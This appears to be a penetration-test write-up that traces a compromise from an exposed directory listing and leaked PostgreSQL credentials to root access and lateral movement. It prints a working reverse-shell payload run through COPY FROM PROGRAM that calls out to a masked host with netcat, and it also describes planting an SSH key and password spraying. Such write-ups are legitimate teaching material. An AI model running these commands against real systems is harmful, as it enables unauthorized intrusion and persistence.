Prologue

"The best exploits are the ones that never feel like exploits at all."Mr. Robot

I discovered that a web server was exposing its directory contents.

None
Directory Listing

Several configuration and compressed files were visible, indicating possible sensitive information leakage.

Source Code Analysis

After downloading and analyzing the exposed files, I found a PHP configuration file containing PostgreSQL database credentials.

None
Source Code Analysis

Database Connection

Using the extracted credentials, I connected to the PostgreSQL server and successfully authenticated.

None
Database Connection

PostgreSQL to Reverse Shell

After confirming access, I attempted to escalate this to Remote Command Execution.

Role Enumeration

First, I enumerated the database role.

None
Database User Role Enumeration

The user had superuser privileges, which was promising.

Permission Enumeration

To enumerate detailed permissions, I used the following query:

SELECT 
      r.rolname, 
      r.rolsuper, 
      r.rolinherit,
      r.rolcreaterole,
      r.rolcreatedb,
      r.rolcanlogin,
      r.rolconnlimit, r.rolvaliduntil,
  ARRAY(SELECT b.rolname
        FROM pg_catalog.pg_auth_members m
        JOIN pg_catalog.pg_roles b ON (m.roleid = b.oid)
        WHERE m.member = r.oid) as memberof
, r.rolreplication
FROM pg_catalog.pg_roles r
ORDER BY 1;
None
Database User Permission Enumeration

The presence of the pg_execute_server_program privilege allowed OS-level command execution.

Remote Code Execution

Using PostgreSQL's COPY FROM PROGRAM, I executed a reverse shell payload

CREATE TABLE shell(output text);
COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc x.x.x.x 4444 >/tmp/f';
None
Command Execution

Listener setup:

nc -lnvp 4444
None
Reverse Shell

SSH Connection

Port 22 (SSH) was open on the target.

None
Open SSH Port

I located the home directory of the postgres user

None
Home Directory of User

Added my public key to authorized_keys

None
Adding Authorized Keys

Successfully logged in via SSH

None
SSH Connection

Priviledge Escalation

While reviewing /etc/passwd, I noticed a system user whose credentials matched those found in the PHP file. Trying the same password worked. This user also had sudo privileges, allowing immediate root shell access

None
Same Password for System User

Lateral Movement

The compromised server resided in a private Class B network. I scanned the subnet for SSH using Gill-Singh-A/Port-Scanner and performed SSH password spraying using Gill-Singh-A/SSH-Brute-Force This resulted in successful access to two additional hosts

None
SSH Brute Force

Attack Path

None
Attack Path — Plotted using Maltego

References